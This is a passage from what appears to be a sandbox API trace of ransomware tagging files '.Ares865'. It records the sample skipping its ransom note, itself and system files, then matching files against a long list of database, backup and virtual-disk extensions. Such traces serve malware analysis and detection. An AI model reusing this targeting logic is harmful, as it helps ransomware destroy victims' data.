| out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.396] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.396] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.396] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.397] CloseHandle (hObject=0x15c) returned 1 [0089.397] CloseHandle (hObject=0x118) returned 1 [0089.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.398] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2c59889, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2c59889, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x4c7d8980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x840, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="resource.xml.Ares865", cAlternateFileName="")) returned 1 [0089.398] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.398] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0089.398] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2=".") returned 1 [0089.398] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="..") returned 1 [0089.398] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="windows") returned -1 [0089.398] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="bootmgr") returned 1 [0089.398] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="temp") returned -1 [0089.398] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="pagefile.sys") returned 1 [0089.398] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="boot") returned 1 [0089.398] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="ids.txt") returned 1 [0089.398] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="ntuser.dat") returned 1 [0089.398] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="perflogs") returned 1 [0089.398] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="MSBuild") returned 1 [0089.398] lstrlenW (lpString="resource.xml.Ares865") returned 20 [0089.398] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned 98 [0089.398] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="resource.xml.Ares865" | out: lpString1="resource.xml.Ares865") returned="resource.xml.Ares865" [0089.398] lstrlenW (lpString="resource.xml.Ares865") returned 20 [0089.398] lstrlenW (lpString="Ares865") returned 7 [0089.398] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.398] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2cf1dfd, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2cf1dfd, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c1f3d69, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xcaa9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ringtones.ico", cAlternateFileName="")) returned 1 [0089.398] lstrcmpiW (lpString1="ringtones.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.398] lstrcmpiW (lpString1="ringtones.ico", lpString2="aoldtz.exe") returned 1 [0089.398] lstrcmpiW (lpString1="ringtones.ico", lpString2=".") returned 1 [0089.398] lstrcmpiW (lpString1="ringtones.ico", lpString2="..") returned 1 [0089.398] lstrcmpiW (lpString1="ringtones.ico", lpString2="windows") returned -1 [0089.398] lstrcmpiW (lpString1="ringtones.ico", lpString2="bootmgr") returned 1 [0089.398] lstrcmpiW (lpString1="ringtones.ico", lpString2="temp") returned -1 [0089.399] lstrcmpiW (lpString1="ringtones.ico", lpString2="pagefile.sys") returned 1 [0089.399] lstrcmpiW (lpString1="ringtones.ico", lpString2="boot") returned 1 [0089.399] lstrcmpiW (lpString1="ringtones.ico", lpString2="ids.txt") returned 1 [0089.399] lstrcmpiW (lpString1="ringtones.ico", lpString2="ntuser.dat") returned 1 [0089.399] lstrcmpiW (lpString1="ringtones.ico", lpString2="perflogs") returned 1 [0089.399] lstrcmpiW (lpString1="ringtones.ico", lpString2="MSBuild") returned 1 [0089.399] lstrlenW (lpString="ringtones.ico") returned 13 [0089.399] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.Ares865") returned 106 [0089.399] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="ringtones.ico" | out: lpString1="ringtones.ico") returned="ringtones.ico" [0089.399] lstrlenW (lpString="ringtones.ico") returned 13 [0089.399] lstrlenW (lpString="Ares865") returned 7 [0089.399] lstrcmpiW (lpString1="nes.ico", lpString2="Ares865") returned 1 [0089.399] lstrlenW (lpString=".dll") returned 4 [0089.399] lstrcmpiW (lpString1="ringtones.ico", lpString2=".dll") returned 1 [0089.399] lstrlenW (lpString=".lnk") returned 4 [0089.399] lstrcmpiW (lpString1="ringtones.ico", lpString2=".lnk") returned 1 [0089.399] lstrlenW (lpString=".ini") returned 4 [0089.399] lstrcmpiW (lpString1="ringtones.ico", lpString2=".ini") returned 1 [0089.399] lstrlenW (lpString=".sys") returned 4 [0089.399] lstrcmpiW (lpString1="ringtones.ico", lpString2=".sys") returned 1 [0089.399] lstrlenW (lpString="ringtones.ico") returned 13 [0089.399] lstrlenW (lpString="bak") returned 3 [0089.399] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0089.399] lstrlenW (lpString="ba_") returned 3 [0089.399] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0089.399] lstrlenW (lpString="dbb") returned 3 [0089.399] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0089.399] lstrlenW (lpString="vmdk") returned 4 [0089.399] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0089.399] lstrlenW (lpString="rar") returned 3 [0089.399] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0089.399] lstrlenW (lpString="zip") returned 3 [0089.399] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0089.399] lstrlenW (lpString="tgz") returned 3 [0089.399] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0089.399] lstrlenW (lpString="vbox") returned 4 [0089.399] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0089.399] lstrlenW (lpString="vdi") returned 3 [0089.400] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0089.400] lstrlenW (lpString="vhd") returned 3 [0089.400] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0089.400] lstrlenW (lpString="vhdx") returned 4 [0089.400] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0089.400] lstrlenW (lpString="avhd") returned 4 [0089.400] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0089.400] lstrlenW (lpString="db") returned 2 [0089.400] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0089.400] lstrlenW (lpString="db2") returned 3 [0089.400] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0089.400] lstrlenW (lpString="db3") returned 3 [0089.400] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0089.400] lstrlenW (lpString="dbf") returned 3 [0089.400] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0089.400] lstrlenW (lpString="mdf") returned 3 [0089.400] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0089.400] lstrlenW (lpString="mdb") returned 3 [0089.400] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0089.400] lstrlenW (lpString="sql") returned 3 [0089.400] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0089.400] lstrlenW (lpString="sqlite") returned 6 [0089.400] lstrcmpiW (lpString1="es.ico", lpString2="sqlite") returned -1 [0089.400] lstrlenW (lpString="sqlite3") returned 7 [0089.400] lstrcmpiW (lpString1="nes.ico", lpString2="sqlite3") returned -1 [0089.400] lstrlenW (lpString="sqlitedb") returned 8 [0089.400] lstrcmpiW (lpString1="ones.ico", lpString2="sqlitedb") returned -1 [0089.400] lstrlenW (lpString="xml") returned 3 [0089.400] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0089.400] lstrlenW (lpString="$er") returned 3 [0089.400] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0089.400] lstrlenW (lpString="4dd") returned 3 [0089.400] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0089.400] lstrlenW (lpString="4dl") returned 3 [0089.400] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0089.400] lstrlenW (lpString="^^^") returned 3 [0089.400] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0089.400] lstrlenW (lpString="abs") returned 3 [0089.400] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0089.401] lstrlenW (lpString="abx") returned 3 [0089.401] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0089.401] lstrlenW (lpString="accdb") returned 5 [0089.401] lstrcmpiW (lpString1="s.ico", lpString2="accdb") returned 1 [0089.401] lstrlenW (lpString="accdc") returned 5 [0089.401] lstrcmpiW (lpString1="s.ico", lpString2="accdc") returned 1 [0089.401] lstrlenW (lpString="accde") returned 5 [0089.401] lstrcmpiW (lpString1="s.ico", lpString2="accde") returned 1 [0089.401] lstrlenW (lpString="accdr") returned 5 [0089.401] lstrcmpiW (lpString1="s.ico", lpString2="accdr") returned 1 [0089.401] lstrlenW (lpString="accdt") returned 5 [0089.401] lstrcmpiW (lpString1="s.ico", lpString2="accdt") returned 1 [0089.401] lstrlenW (lpString="accdw") returned 5 [0089.401] lstrcmpiW (lpString1="s.ico", lpString2="accdw") returned 1 [0089.401] lstrlenW (lpString="accft") returned 5 [0089.401] lstrcmpiW (lpString1="s.ico", lpString2="accft") returned 1 [0089.401] lstrlenW (lpString="adb") returned 3 [0089.401] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.401] lstrlenW (lpString="adb") returned 3 [0089.401] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.401] lstrlenW (lpString="ade") returned 3 [0089.401] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0089.401] lstrlenW (lpString="adf") returned 3 [0089.401] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0089.401] lstrlenW (lpString="adn") returned 3 [0089.401] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0089.401] lstrlenW (lpString="adp") returned 3 [0089.401] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0089.401] lstrlenW (lpString="alf") returned 3 [0089.401] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0089.401] lstrlenW (lpString="ask") returned 3 [0089.401] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0089.401] lstrlenW (lpString="btr") returned 3 [0089.401] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0089.401] lstrlenW (lpString="cat") returned 3 [0089.401] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0089.401] lstrlenW (lpString="cdb") returned 3 [0089.401] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0089.401] lstrlenW (lpString="ckp") returned 3 [0089.402] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0089.402] lstrlenW (lpString="cma") returned 3 [0089.402] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0089.402] lstrlenW (lpString="cpd") returned 3 [0089.402] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0089.402] lstrlenW (lpString="dacpac") returned 6 [0089.402] lstrcmpiW (lpString1="es.ico", lpString2="dacpac") returned 1 [0089.402] lstrlenW (lpString="dad") returned 3 [0089.402] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0089.402] lstrlenW (lpString="dadiagrams") returned 10 [0089.402] lstrcmpiW (lpString1="gtones.ico", lpString2="dadiagrams") returned 1 [0089.402] lstrlenW (lpString="daschema") returned 8 [0089.402] lstrcmpiW (lpString1="ones.ico", lpString2="daschema") returned 1 [0089.402] lstrlenW (lpString="db-journal") returned 10 [0089.402] lstrcmpiW (lpString1="gtones.ico", lpString2="db-journal") returned 1 [0089.402] lstrlenW (lpString="db-shm") returned 6 [0089.402] lstrcmpiW (lpString1="es.ico", lpString2="db-shm") returned 1 [0089.402] lstrlenW (lpString="db-wal") returned 6 [0089.402] lstrcmpiW (lpString1="es.ico", lpString2="db-wal") returned 1 [0089.402] lstrlenW (lpString="dbc") returned 3 [0089.402] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0089.402] lstrlenW (lpString="dbs") returned 3 [0089.402] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0089.402] lstrlenW (lpString="dbt") returned 3 [0089.402] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0089.402] lstrlenW (lpString="dbv") returned 3 [0089.402] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0089.402] lstrlenW (lpString="dbx") returned 3 [0089.402] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0089.402] lstrlenW (lpString="dcb") returned 3 [0089.402] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0089.402] lstrlenW (lpString="dct") returned 3 [0089.402] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0089.402] lstrlenW (lpString="dcx") returned 3 [0089.402] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0089.402] lstrlenW (lpString="ddl") returned 3 [0089.402] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0089.403] lstrlenW (lpString="dlis") returned 4 [0089.403] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0089.403] lstrlenW (lpString="dp1") returned 3 [0089.403] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0089.403] lstrlenW (lpString="dqy") returned 3 [0089.403] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0089.403] lstrlenW (lpString="dsk") returned 3 [0089.403] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0089.403] lstrlenW (lpString="dsn") returned 3 [0089.403] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0089.403] lstrlenW (lpString="dtsx") returned 4 [0089.403] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0089.403] lstrlenW (lpString="dxl") returned 3 [0089.403] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0089.403] lstrlenW (lpString="eco") returned 3 [0089.403] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0089.403] lstrlenW (lpString="ecx") returned 3 [0089.403] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0089.403] lstrlenW (lpString="edb") returned 3 [0089.403] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0089.403] lstrlenW (lpString="epim") returned 4 [0089.403] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0089.403] lstrlenW (lpString="fcd") returned 3 [0089.403] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0089.403] lstrlenW (lpString="fdb") returned 3 [0089.403] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0089.403] lstrlenW (lpString="fic") returned 3 [0089.403] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0089.403] lstrlenW (lpString="flexolibrary") returned 12 [0089.403] lstrcmpiW (lpString1="ingtones.ico", lpString2="flexolibrary") returned 1 [0089.403] lstrlenW (lpString="fm5") returned 3 [0089.403] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0089.403] lstrlenW (lpString="fmp") returned 3 [0089.403] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0089.403] lstrlenW (lpString="fmp12") returned 5 [0089.403] lstrcmpiW (lpString1="s.ico", lpString2="fmp12") returned 1 [0089.403] lstrlenW (lpString="fmpsl") returned 5 [0089.403] lstrcmpiW (lpString1="s.ico", lpString2="fmpsl") returned 1 [0089.403] lstrlenW (lpString="fol") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0089.404] lstrlenW (lpString="fp3") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0089.404] lstrlenW (lpString="fp4") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0089.404] lstrlenW (lpString="fp5") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0089.404] lstrlenW (lpString="fp7") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0089.404] lstrlenW (lpString="fpt") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0089.404] lstrlenW (lpString="frm") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0089.404] lstrlenW (lpString="gdb") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.404] lstrlenW (lpString="gdb") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.404] lstrlenW (lpString="grdb") returned 4 [0089.404] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0089.404] lstrlenW (lpString="gwi") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0089.404] lstrlenW (lpString="hdb") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0089.404] lstrlenW (lpString="his") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0089.404] lstrlenW (lpString="ib") returned 2 [0089.404] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0089.404] lstrlenW (lpString="idb") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0089.404] lstrlenW (lpString="ihx") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0089.404] lstrlenW (lpString="itdb") returned 4 [0089.404] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0089.404] lstrlenW (lpString="itw") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0089.404] lstrlenW (lpString="jet") returned 3 [0089.404] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0089.404] lstrlenW (lpString="jtx") returned 3 [0089.405] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0089.405] lstrlenW (lpString="kdb") returned 3 [0089.405] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0089.405] lstrlenW (lpString="kexi") returned 4 [0089.405] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0089.405] lstrlenW (lpString="kexic") returned 5 [0089.405] lstrcmpiW (lpString1="s.ico", lpString2="kexic") returned 1 [0089.405] lstrlenW (lpString="kexis") returned 5 [0089.405] lstrcmpiW (lpString1="s.ico", lpString2="kexis") returned 1 [0089.405] lstrlenW (lpString="lgc") returned 3 [0089.405] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0089.405] lstrlenW (lpString="lwx") returned 3 [0089.405] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0089.405] lstrlenW (lpString="maf") returned 3 [0089.405] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0089.405] lstrlenW (lpString="maq") returned 3 [0089.405] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0089.405] lstrlenW (lpString="mar") returned 3 [0089.405] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0089.405] lstrlenW (lpString="marshal") returned 7 [0089.405] lstrcmpiW (lpString1="nes.ico", lpString2="marshal") returned 1 [0089.405] lstrlenW (lpString="mas") returned 3 [0089.405] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0089.405] lstrlenW (lpString="mav") returned 3 [0089.405] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0089.405] lstrlenW (lpString="maw") returned 3 [0089.405] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0089.405] lstrlenW (lpString="mdbhtml") returned 7 [0089.405] lstrcmpiW (lpString1="nes.ico", lpString2="mdbhtml") returned 1 [0089.405] lstrlenW (lpString="mdn") returned 3 [0089.405] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0089.405] lstrlenW (lpString="mdt") returned 3 [0089.405] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0089.405] lstrlenW (lpString="mfd") returned 3 [0089.405] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0089.405] lstrlenW (lpString="mpd") returned 3 [0089.405] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0089.405] lstrlenW (lpString="mrg") returned 3 [0089.405] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0089.406] lstrlenW (lpString="mud") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0089.406] lstrlenW (lpString="mwb") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0089.406] lstrlenW (lpString="myd") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0089.406] lstrlenW (lpString="ndf") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0089.406] lstrlenW (lpString="nnt") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0089.406] lstrlenW (lpString="nrmlib") returned 6 [0089.406] lstrcmpiW (lpString1="es.ico", lpString2="nrmlib") returned -1 [0089.406] lstrlenW (lpString="ns2") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0089.406] lstrlenW (lpString="ns3") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0089.406] lstrlenW (lpString="ns4") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0089.406] lstrlenW (lpString="nsf") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0089.406] lstrlenW (lpString="nv") returned 2 [0089.406] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0089.406] lstrlenW (lpString="nv2") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0089.406] lstrlenW (lpString="nwdb") returned 4 [0089.406] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0089.406] lstrlenW (lpString="nyf") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0089.406] lstrlenW (lpString="odb") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.406] lstrlenW (lpString="odb") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.406] lstrlenW (lpString="oqy") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0089.406] lstrlenW (lpString="ora") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0089.406] lstrlenW (lpString="orx") returned 3 [0089.406] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0089.406] lstrlenW (lpString="owc") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0089.407] lstrlenW (lpString="p96") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0089.407] lstrlenW (lpString="p97") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0089.407] lstrlenW (lpString="pan") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0089.407] lstrlenW (lpString="pdb") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0089.407] lstrlenW (lpString="pdm") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0089.407] lstrlenW (lpString="pnz") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0089.407] lstrlenW (lpString="qry") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0089.407] lstrlenW (lpString="qvd") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0089.407] lstrlenW (lpString="rbf") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0089.407] lstrlenW (lpString="rctd") returned 4 [0089.407] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0089.407] lstrlenW (lpString="rod") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0089.407] lstrlenW (lpString="rodx") returned 4 [0089.407] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0089.407] lstrlenW (lpString="rpd") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0089.407] lstrlenW (lpString="rsd") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0089.407] lstrlenW (lpString="sas7bdat") returned 8 [0089.407] lstrcmpiW (lpString1="ones.ico", lpString2="sas7bdat") returned -1 [0089.407] lstrlenW (lpString="sbf") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0089.407] lstrlenW (lpString="scx") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0089.407] lstrlenW (lpString="sdb") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0089.407] lstrlenW (lpString="sdc") returned 3 [0089.407] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0089.408] lstrlenW (lpString="sdf") returned 3 [0089.408] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0089.408] lstrlenW (lpString="sis") returned 3 [0089.408] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0089.408] lstrlenW (lpString="spq") returned 3 [0089.408] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0089.408] lstrlenW (lpString="te") returned 2 [0089.408] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0089.408] lstrlenW (lpString="teacher") returned 7 [0089.408] lstrcmpiW (lpString1="nes.ico", lpString2="teacher") returned -1 [0089.408] lstrlenW (lpString="tmd") returned 3 [0089.408] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0089.408] lstrlenW (lpString="tps") returned 3 [0089.408] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0089.408] lstrlenW (lpString="trc") returned 3 [0089.408] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.408] lstrlenW (lpString="trc") returned 3 [0089.408] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.408] lstrlenW (lpString="trm") returned 3 [0089.408] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0089.408] lstrlenW (lpString="udb") returned 3 [0089.408] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0089.408] lstrlenW (lpString="udl") returned 3 [0089.408] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0089.408] lstrlenW (lpString="usr") returned 3 [0089.408] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0089.408] lstrlenW (lpString="v12") returned 3 [0089.408] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0089.408] lstrlenW (lpString="vis") returned 3 [0089.408] lstrcmpiW 